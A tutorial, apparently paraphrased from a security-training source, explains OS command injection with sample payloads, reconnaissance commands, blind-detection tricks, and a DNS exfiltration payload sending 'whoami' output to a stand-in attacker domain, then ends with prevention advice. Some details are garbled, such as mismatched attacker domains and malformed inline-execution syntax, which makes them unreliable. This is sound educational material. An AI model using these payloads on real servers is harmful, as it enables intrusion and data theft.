OS Command Injection: The Ultimate Guide to Exploiting Vulnerabilities
What is Command or Shell injection?
A cyber susceptibility called OS command injection, often known as shell injection, enables an attacker to run an arbitrary operating system (OS) commands on a server that is hosting an application, effectively compromising both the application and all of its data. Frequently, an attacker can use an OS command injection vulnerability to compromise other elements of the hosting infrastructure by taking advantage of trust connections to refocus the assault on other systems within the company.
Watch this Youtube video explaining the subject here.
How does it execute random requests?
Think about a shopping app that enables the user to see whether an item is in stock at a specific retailer. Using a URL like: you can obtain this information.
>https://skyhigh.tex/stockStatus?productID=17533&storeID=989
The application needs to contact several legacy systems in order to give the stock information. Due to historical considerations, the feature is implemented by issuing the following shell command with the arguments store and product IDs:
>stockreport.pl 17533 989
The user gets informed of the item’s stock status after executing this command. An attacker can submit the following input to execute any command because the application doesn’t include any protections against OS command injection:
>& echo aiwefwlguh &
The following command is carried out by the application if this input is entered into the productID parameter:
>stockreport.pl & echo aiwefwlguh & 989
One practical technique to check for various types of OS command injection is to use the echo command, which simply causes the specified string to be echoed in the output. Because the & character serves as a command separator in the shell, three independent commands are actually performed one after the other. As a result, the user received the following output:
>Error – productID was not provided
>aiwefwlguh
>989: command not found
The first three lines of output show that the initial stockreport.pl command was run without the correct inputs, which resulted in an error message being returned. Then, The given string was produced once the injected echo command had been executed. Finally, An error resulted because the initial parameter 989 was utilized as a command.
Because it separates the injected command from whatever comes after the injection point, adding the additional command separator & after the injected command is typically beneficial. This lessens the possibility that what happens next will stop the injected command from being executed.
For another article that might help for further reading, click here.
What are the most memorable commands?
It is usually beneficial to run some early commands after discovering an OS command injection vulnerability to learn more about the system that has been exploited. A list of some useful commands for Linux and Windows systems is provided below:
| Command Action | Linux | Windows |
| Current User | whoami | whoami |
| Operating system | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |
Describe blind OS command injection vulnerabilities?
Blind vulnerabilities frequently accompany OS command injection. This indicates that in its HTTP response, the program does not provide the command’s output. Although other methods are needed, blind vulnerabilities can still be exploited. Think of a website that allows visitors to provide reviews. The user inputs their email address and a message of criticism. The feedback is subsequently generated into an email and sent to the site administrator by the server-side program. It calls out to the mail program with the provided information to accomplish this. Consider this:
>mail -s “This site is great” -aFrom:peter@normal-user.net feedback@vulnerable-website.com
It would be ineffective to use the echo payload because the mail command’s output if any, is not returned in the answers from the application. In this case, you can find and take advantage of vulnerabilities using a number of additional approaches.
How to use time delays to identify blind OS command injection?
By using an injected command that causes a time delay, you may determine whether the command was actually executed depending on how long it takes the application to react. This can be accomplished using the ping command, which allows you to control the number of ICMP packets to transmit and, consequently, the command’s execution time:
>& ping -c 10 127.0.0.1 &
The request will ping its loopback network adapter for 10 seconds as a result of this instruction.
How to redirect a result to take advantage of blind OS command injection?
The output of the injected command can be redirected into a file in the web root, which you can then access through the browser. You can include the following information, for instance, if the application provides static resources from the directory /var/www/static on the filesystem:
>& whoami > /var/www/static/whoami.txt &
Whenever executing the whoami command output is sent to the designated file by the > character. When you have the file, you can inspect the output from the injected command by using the browser to fetch https://vulnerable-website.com/whoami.txt.
How to exploit using Out-of-band application security testing (OAST) techniques?
Using OAST techniques, you can use an injected command to start an out-of-band network interaction with a system that you’re in charge of. For instance:
>& nslookup kgji2ohoyw.web-attacker.com &
In order to perform a DNS lookup for the supplied domain, this payload uses the nslookup command. In order to determine whether the command was successfully injected, the attacker might keep an eye out for the specific lookup to occur. The output from injected instructions can likewise be easily exfiltrated using the out-of-band channel:
>& nslookup `whoami`.kgji2ohoyw.taxattacker.com &
As a result, a DNS lookup to the attacker’s domain will result in the whoami command result being displayed:
>wwwuser.kgji2ohoyw.web-attacker.com
What are the techniques used for OS injection?
Attacks involving OS command injection can be carried out via a number of shell metacharacters. Commands can be chained together by using certain characters as command separators. On both Windows and Unix-based systems, the following command separators are functional (&, &&, |, ||).
On Unix-based systems only, the following command separators are functional (; or newline <0x0a or \n>).
Inline execution of an injected command within the first command is also possible on Unix-based systems using (`( injected command `
)) or the ($( injected command ))
Keep in mind that the various shell metacharacters exhibit subtle differences in behavior that may have an impact on when they function and whether they permit in-band retrieval of command output or are only effective for blind exploitation. There are situations when the original command’s input is enclosed in quotation marks. In this case, you must end the quoted context (using ” or ‘) before injecting a new command with the appropriate shell metacharacters.
How to stop attacks using OS command injection?
Never requesting OS commands from application-layer code is by far the best technique to guard against OS command injection issues. There are almost always better ways to implement the necessary functionality using secure platform APIs. Strong input validation must be carried out if calling out OS commands with user input is deemed to be an unavoidable necessity. Effective validation includes, for instance:
- checking the validity against a whitelist of accepted values.
- confirming that a number was entered.
- ensuring that the input is entirely composed of alphanumeric characters and is free of any additional syntax or whitespace
By escaping shell metacharacters, never try to sanitize input. In reality, this is just too prone to mistakes and open to being gotten around by a cunning adversary.
Conclusion
The majority of programming languages have capabilities that allow programmers to call commands from the operating system. There are several reasons to use operating system commands, including adding functionality that is not by default included in that programming language, calling scripts written in other languages, and more. The use of such operating system call functions with insufficient input validation leads to OS command injection vulnerabilities. Due to a lack of validation, an attacker is able to insert malicious commands into user input and then have the host operating system carry them out. The application security issue of command injection vulnerabilities can affect any kind of computer software, practically any programming language, and any platform. For instance, embedded software in routers, web apps, and APIs written in PHP, server-side scripts written in Python, mobile applications written in Java, and even core operating system software might all have command injection vulnerabilities.
This application’s capacity to execute operating system (OS) instructions is vulnerable to being tricked by a hostile hacker known as OS command injection. It’s also referred to as command injection or shell injection when it comes to OS commands.
| Severity: | X X X X | severe |
| Prevalence: | X | discovered rarely |
| Scope: | X X X X X | may appear in all computer software |
| Technical impact: | command shell access | |
| Worst-case consequences: | full system compromise | |
| Quick fix: | do not call OS functions based on user input |
